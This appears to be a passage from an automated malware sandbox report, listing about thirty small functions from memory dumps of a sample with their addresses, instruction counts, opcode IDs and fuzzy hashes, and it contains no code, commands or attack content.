                                      • Instruction Fuzzy Hash: DEF08C32704119AF9B10AE99F8449AFBBEEFBC8220714812AF51DD7240DB71D80697A0
                                      Function 0BBE2C60 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1fd0e0d1154ce10ecd099cd8dbd4059e460c09d51e6f33228ca033e8a6b113e6
                                      • Instruction ID: ba273f8f5e89e9ca6ee2a427d5b9ab9bb2f377407aa3126baedfe8ef5fa7ffaa
                                      • Opcode Fuzzy Hash: 1fd0e0d1154ce10ecd099cd8dbd4059e460c09d51e6f33228ca033e8a6b113e6
                                      • Instruction Fuzzy Hash: 11118E32E006198BDF28CFA5D8502DDB7B6BF88700F258529D812BB7A4CF745D059BA2
                                      Function 0157D041 Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3708191961.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_157d000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e41074f3351602fc193b91cecca4155e36c6ec4a274be9ee14c83eb781c08f47
                                      • Instruction ID: d96a088c295f1b9d0d5189ab0955910250a3768ccd4ae9a39c8046094a0a617d
                                      • Opcode Fuzzy Hash: e41074f3351602fc193b91cecca4155e36c6ec4a274be9ee14c83eb781c08f47
                                      • Instruction Fuzzy Hash: 2801F7315083449FE7224A65DD85B2ABFE8FF80265F08C51AED480E283E2399845CAB2
                                      Function 0BBE2EA8 Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c53a6207abe7e62091b681b156b77e4238b56a042f4ff1698d60041999830a0d
                                      • Instruction ID: 43eb7308149dd662b6a569c116a1364719d07d36282f037ff591d65356c9ce62
                                      • Opcode Fuzzy Hash: c53a6207abe7e62091b681b156b77e4238b56a042f4ff1698d60041999830a0d
                                      • Instruction Fuzzy Hash: F301A276E002085FCB14DEAAD4006AFB7F5EBC4711B158466E815E7340DA329945CBA4
                                      Function 0BBE4E88 Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f60dec61e236af6ce784fbd81be3f5d3c2d014d67f14f5ae4ae544eb6d830e5d
                                      • Instruction ID: fb9e3f1da64fc358198a67226f3de8fb1ff2caa3caa2b3977ee77759e4a5f4d3
                                      • Opcode Fuzzy Hash: f60dec61e236af6ce784fbd81be3f5d3c2d014d67f14f5ae4ae544eb6d830e5d
                                      • Instruction Fuzzy Hash: ED012B306052408FC329CF28D494AAAFBF2FF45300B1445DBE0468B761C7B4BC45CB61
                                      Function 0BBE3DE8 Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb6b52c999b369fa38eb0a70569b4dd641276852bd4857fd778ed1f841c0f71f
                                      • Instruction ID: 3dc555e1471267bd1083f97c6a715de5f7a3a6f8bfcc74b8507f7588c837ef16
                                      • Opcode Fuzzy Hash: bb6b52c999b369fa38eb0a70569b4dd641276852bd4857fd778ed1f841c0f71f
                                      • Instruction Fuzzy Hash: 64018F31E042199FCB21CBA8D8849AEBBF5FF8D210B108565D515EB292C770A905CBE1
                                      Function 0B6B5799 Relevance: .0, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4fc75fc3a19c463bcfa64e5cf284104e08d41fdb5cf1df59a69cd8a62b4a112
                                      • Instruction ID: 6fee9a36fadcb5695cadb2dac29573d8ec9aea00162683ca0e1b9aae98c772f8
                                      • Opcode Fuzzy Hash: b4fc75fc3a19c463bcfa64e5cf284104e08d41fdb5cf1df59a69cd8a62b4a112
                                      • Instruction Fuzzy Hash: 72015EB0D04349AFCB54DFA8D454ADDBBB0FF45214F1482EAD8299B392E7349A90CF81
                                      Function 0BBE7848 Relevance: .0, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2cdd613968f99993aabfec98c34d618c7a80a3b33fa9bd6327639ee9cbeccd53
                                      • Instruction ID: 0965e8552ea9ea97a5acb60d996ac141e7105e71f4c92fdff02b1ba0d01d74d5
                                      • Opcode Fuzzy Hash: 2cdd613968f99993aabfec98c34d618c7a80a3b33fa9bd6327639ee9cbeccd53
                                      • Instruction Fuzzy Hash: F8014B6191A3805FEB1B4B3198602A03F32AFA7344B5900DEC0969E1E7DA1A1847D715
                                      Function 0B6B5708 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0ae001be4e43fc3adab97706b1f0454c1d3a887b137b3e6660575c3aba047707
                                      • Instruction ID: 67c849be39b60ad6f1f41a4763a842e1be0c3b8e65d0db120a5557cc737b3c41
                                      • Opcode Fuzzy Hash: 0ae001be4e43fc3adab97706b1f0454c1d3a887b137b3e6660575c3aba047707
                                      • Instruction Fuzzy Hash: B101D674E54248EFCB50CFA8D454A9CBBB0EB19210F0581EAD81ADB361E7359D44CF41
                                      Function 0BBE3DF8 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4c7ee23f5db7a7cea91b4cccd2bb366cee5bd4962f46eaf20f986319cd9bb8f9
                                      • Instruction ID: 3a5a1d09990e583c7192de9907eba6ce1dbf03bd61146c0b94190c93b1c18b1d
                                      • Opcode Fuzzy Hash: 4c7ee23f5db7a7cea91b4cccd2bb366cee5bd4962f46eaf20f986319cd9bb8f9
                                      • Instruction Fuzzy Hash: E5F04935A002299FCB10DB98D9849AEBBF9FB8C211B108165D919A7205C770E9068BF1
                                      Function 0BBEDD48 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cf3932620d9a235afb0ca09d1b3ad9f1dae9ebfb1173d9a0e24e032740ff0f12
                                      • Instruction ID: 300ea3e2aa9bcb9601f1d8c1eb1fc40b4c4fc65dea372a5a8d003dbb834c48f2
                                      • Opcode Fuzzy Hash: cf3932620d9a235afb0ca09d1b3ad9f1dae9ebfb1173d9a0e24e032740ff0f12
                                      • Instruction Fuzzy Hash: 85013C70D04348AFDBA5DFB4A41439CBFB0EB06319F4082FAC869A6360E7754944DF50
                                      Function 0157D040 Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3708191961.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_157d000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6aceedca713b128bc097fb12656e69e210f9960c3e458d6be607ade0c2c1f7fd
                                      • Instruction ID: 95c267ead064d4204cd0f6159ed62c54b5e7ead6f34bdb398c5bec166f22269c
                                      • Opcode Fuzzy Hash: 6aceedca713b128bc097fb12656e69e210f9960c3e458d6be607ade0c2c1f7fd
                                      • Instruction Fuzzy Hash: 14F0C2714053449FE7218A19DD84B66FFA8EF80374F18C55AED080E283D2799844CAB1
                                      Function 0B6B56C9 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60e6db95fe2399fd0289630b793f8e49977969f7c370d56022697e79355d6a82
                                      • Instruction ID: 0562da17cca6adde6605e140979e54ad4530d2334888562a59e0efa92ff78fce
                                      • Opcode Fuzzy Hash: 60e6db95fe2399fd0289630b793f8e49977969f7c370d56022697e79355d6a82
                                      • Instruction Fuzzy Hash: E8F03770A143889FCB50DF78D469A98BFB0EF06215F1541EAE909DB772E6318980CB81
                                      Function 0BBE24A0 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 93adcb7fe49fc0b400a94d2b53aadd974d5d9d2bf148108feaeaba388720ccec
                                      • Instruction ID: 7bf1c1e4413557ba2018ba39dc3711a53771aef76f1cfa4703b18e63d3784220
                                      • Opcode Fuzzy Hash: 93adcb7fe49fc0b400a94d2b53aadd974d5d9d2bf148108feaeaba388720ccec
                                      • Instruction Fuzzy Hash: 48F08232F005188BEF28C5B998182ED7BB6ABC8220F01817AD516E7294EF755916DAA0
                                      Function 0BBE0D8F Relevance: .0, Instructions: 33COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bfea7427aef03a25b5f682a2cd0ad6193aaa6d2feb8065f93c8a6cb5793b6440
                                      • Instruction ID: aaf8dcf75420c1db3d8dc8a773740e7682008803efde224bfb1f515f3ccdcfaa
                                      • Opcode Fuzzy Hash: bfea7427aef03a25b5f682a2cd0ad6193aaa6d2feb8065f93c8a6cb5793b6440
                                      • Instruction Fuzzy Hash: 3DF0A7727081195F9B14DA55A8449BFBBFDEB95225B05807AE41CD7240DB70C80687A0
                                      Function 0B6B0505 Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f762e1cd18adba72111325169b3dc3676505c07e6e45920061d22a136b120954
                                      • Instruction ID: b5340407d9d897fa564f48b33285a7e86a1874d6b01b7764cd01cd2d9354e2c7
                                      • Opcode Fuzzy Hash: f762e1cd18adba72111325169b3dc3676505c07e6e45920061d22a136b120954
                                      • Instruction Fuzzy Hash: B601DAB4D052199FCB54CF54D880ADDBBF6FF48311F0054A9940AE7324DB309A85CF51
                                      Function 0BBE7F50 Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5fcdf96d801d3656d0550ede9c40e5b76a5990472a89ab1cb76bd2261906ec0d
                                      • Instruction ID: e069eec9eddaa8651cd16beae48cf94901a422aea7f2ce5657461fb4b8c5c87d
                                      • Opcode Fuzzy Hash: 5fcdf96d801d3656d0550ede9c40e5b76a5990472a89ab1cb76bd2261906ec0d
                                      • Instruction Fuzzy Hash: 95F0B4323083409FC7158F66EC9096A77A6FFC9221314C4BAE869C7360CB38DD01CBA0
                                      Function 0BBE1DC1 Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 40a6cceaeef5cb4490f89f5060ee47e9428c2ac545990aeef2ef01144be73ef5
                                      • Instruction ID: cb791ca2ac8bb9c0b8dee170e8304e9bfaa36e89d97ab57fc0e94224dc52f7e6
                                      • Opcode Fuzzy Hash: 40a6cceaeef5cb4490f89f5060ee47e9428c2ac545990aeef2ef01144be73ef5
                                      • Instruction Fuzzy Hash: 1DF0A7317003405FD325D669AC95AAF6BEADFD9261B00453DD10AC7351DFA5AD09C3E2
                                      Function 0B6B57E8 Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a11525fc0b510684a4af59d427ba533fdf85f64e8b564805f13d910670bf1e3a
                                      • Instruction ID: c59eea6c3e185df324e67492827a64bbcdfb0c2c644980cb2dac9792893ccb50
                                      • Opcode Fuzzy Hash: a11525fc0b510684a4af59d427ba533fdf85f64e8b564805f13d910670bf1e3a
                                      • Instruction Fuzzy Hash: 2CF06DB5D54248AFCB51DFB8D454A8CBFB0FB1A210F1041EAC816DB391E3308A44CF41
                                      Function 0B6B48D1 Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 02c4c562f4c4b8ee5d4c53b2866b0db6e8fb9cb2381f79e46c77078dc894a22a
                                      • Instruction ID: ce91ce0dd95bc6bb4120a84ab109dc49774c6bc35b241740ab2990d93f720546
                                      • Opcode Fuzzy Hash: 02c4c562f4c4b8ee5d4c53b2866b0db6e8fb9cb2381f79e46c77078dc894a22a
                                      • Instruction Fuzzy Hash: 90F05EB0D082899FCF54DFA89040AACBFF0EB06310F0082EAC818D3352DB358A50CF41
                                      Function 0BBE1D27 Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f11213742786d0c3f236018308190928375ca1c31ac5fe411933aa3600b9c780
                                      • Instruction ID: 2444ac3dd92d00aa01d1ffceb5669e314a335c09ebff8822295ff52851c9170c
                                      • Opcode Fuzzy Hash: f11213742786d0c3f236018308190928375ca1c31ac5fe411933aa3600b9c780
                                      • Instruction Fuzzy Hash: 8DE022227002215BC219A29DB0102E8BBC3EBE01A171681ABD202CF3A8CEA58C0B03C6
                                      Function 0B6B4928 Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0b8b65608e7f99b45201e808a4b534b4b7be4c5d00e55deac28449a2317ee36f
                                      • Instruction ID: 7b8c3fbf3add2e23130c2aa54810a643fe319043c0e0610fe099ae4c160c2f63
                                      • Opcode Fuzzy Hash: 0b8b65608e7f99b45201e808a4b534b4b7be4c5d00e55deac28449a2317ee36f
                                      • Instruction Fuzzy Hash: 20F065B4C4D2D59FC727EBB490A0AEC7F70AB02324F4401DBC5549B393DA318A89C7A5
                                      Function 0B6B42A2 Relevance: .0, Instructions: 28COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 61cf63660a63cfba689ccf90f327ece64242667173da42946aa637369dd1aafa
                                      • Instruction ID: fcc364343ade0c5824eaf9a3ab310b406ffce018a103cf8746be4482b2a0e286
                                      • Opcode Fuzzy Hash: 61cf63660a63cfba689ccf90f327ece64242667173da42946aa637369dd1aafa
                                      • Instruction Fuzzy Hash: D3F058B1904348AFCB92DFA8D804F9DBFB0AF5A310F01819AE854AB3A2D3318954DB41
                                      Function 0BBE1DD0 Relevance: .0, Instructions: 28COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96d5d3efdfa34a155e1b66a8d1fe8ae6b8ed47838285eb3d172097e58ebde67f
                                      • Instruction ID: e8c52afc6432daa3a6b70f665aafc7c5e0e0eba208d2571d47a24b68945b9772
                                      • Opcode Fuzzy Hash: 96d5d3efdfa34a155e1b66a8d1fe8ae6b8ed47838285eb3d172097e58ebde67f
                                      • Instruction Fuzzy Hash: D7E092317003101BD22096ADA88495FBBDEEBC9261B404539E10AC7300DFA5AD0983E2
                                      Function 0B6B6720 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9ceaaf92d0194d48660294906ad809ab4bf1da9089aa5b09c56dc4f3eb7a87a0
                                      • Instruction ID: d738d05e565511b3a2ee335f3d0f7b52e34943f62a16ee0fca52a96b731c3147
                                      • Opcode Fuzzy Hash: 9ceaaf92d0194d48660294906ad809ab4bf1da9089aa5b09c56dc4f3eb7a87a0
                                      • Instruction Fuzzy Hash: 94F09BB0D04348BFC751DFB498117DD7FB8AB45300F5140EAD854D7291E7754A54CB91
                                      Function 0B6B67B1 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e76ab878b9f7b77419faa075ff4abbc6adff85e80d093fd33b1283642c98a38c
                                      • Instruction ID: a8f2be04a8bcade4c97460eef755ede3c2953667e63f1add12f35c7c577a0e22
                                      • Opcode Fuzzy Hash: e76ab878b9f7b77419faa075ff4abbc6adff85e80d093fd33b1283642c98a38c
                                      • Instruction Fuzzy Hash: 2CF082B0904349AFCB12DBA4D940BDD7F75BF06320F04818AE8646A2D5C7715540DBD1
                                      Function 0B6B2F81 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 03c5ce8fa2b35caf3a814ac4a84139085dfc441a8d193d79711181531530abf6
                                      • Instruction ID: 9658a786b00008993e79ea7f39789ca8fbf96fe98a07d37adfe76734a72d9948
                                      • Opcode Fuzzy Hash: 03c5ce8fa2b35caf3a814ac4a84139085dfc441a8d193d79711181531530abf6
                                      • Instruction Fuzzy Hash: 44F058B4D042099FCB50DFA8C411AADBFF0FB09300F1081EAC815A3350D3784A40DF80
                                      Function 0B6B0844 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 05423ca6583d6d0d1a26039cc49c76e73236cfc4722a58a73a9dc531535602c5
                                      • Instruction ID: 426d5cb83935cefb0fc33016812ce619c248ae3f3fc73fda628d365f638f8410
                                      • Opcode Fuzzy Hash: 05423ca6583d6d0d1a26039cc49c76e73236cfc4722a58a73a9dc531535602c5
                                      • Instruction Fuzzy Hash: 6DE03975D046158BC710CB69C8406E4F775BFCA224F15A3A1D12DA3212DB3099D58B44
                                      Function 0BBE9020 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9864c38b5a7f23d6d3764f90b19f1d7bc35eead49ae15e4c37a354875dde2689
                                      • Instruction ID: aaa889eddfa3bdba030a18241ca1c11ac67730e1435a1125a74d459196af3f32
                                      • Opcode Fuzzy Hash: 9864c38b5a7f23d6d3764f90b19f1d7bc35eead49ae15e4c37a354875dde2689
                                      • Instruction Fuzzy Hash: 04F06D70E10208AFCB94DFA8D0517DDBBF1EB85310F1081EAC925AB350E7794946CF80
                                      Function 0B6B15B0 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d9e11a09782bf0181b6b3d2959af3edb114c9894af00f0c696f7e36554f5db20
                                      • Instruction ID: bd3b1df21d849730daa5339b7330a5231279ddf08fce133f618545bb46edb3c6
                                      • Opcode Fuzzy Hash: d9e11a09782bf0181b6b3d2959af3edb114c9894af00f0c696f7e36554f5db20
                                      • Instruction Fuzzy Hash: D0E092B1D04248AFCB60DBB9D860EEDBFB1AB46300F0082AAC516A7354DA350A41DB94
                                      Function 0B6B2CBF Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1d6e032fdcaa29be457f72a6dbae3029450c21730ac28f881bf76109ef879f68
                                      • Instruction ID: 6bc294a95bf2a8d19a95b3a5b8b5998dd1c30480741c7c1b5fd11421dcdbc1b6
                                      • Opcode Fuzzy Hash: 1d6e032fdcaa29be457f72a6dbae3029450c21730ac28f881bf76109ef879f68
                                      • Instruction Fuzzy Hash: 87E0E5B0D10288AFCB94EFB9E0557ECBBF0EB55211F0081AEC819A3354E7354A46CF50
                                      Function 0BBE89A3 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0b5a20decb7009c01e7572082b7638ed7497664ab03e79a9955760587b42005d
                                      • Instruction ID: d0928afd3ea76bcf3c8b41e386ec78f811c7df716a3cdfa71bcdb2445c0e7833
                                      • Opcode Fuzzy Hash: 0b5a20decb7009c01e7572082b7638ed7497664ab03e79a9955760587b42005d
                                      • Instruction Fuzzy Hash: 8CF07F78E15318DFCB50CFA4C98499DFBB1AB48210F2094AAD819AB354D7349980CF11
                                      Function 0BBEDD90 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 547afc642057a5ef03ec5708657cd10151f54f32643a845d4f6158e47ea0ae56
                                      • Instruction ID: d9843910d431af656bf39ba4bbf42fe6ad729ba930bf553147c5fc7ffc0a9c3d
                                      • Opcode Fuzzy Hash: 547afc642057a5ef03ec5708657cd10151f54f32643a845d4f6158e47ea0ae56
                                      • Instruction Fuzzy Hash: AEF039B1D14248AFCB95DBB490143AD7FF0AB56305F1081EEC425A2290E7358944CF00
                                      Function 0B6B0F39 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
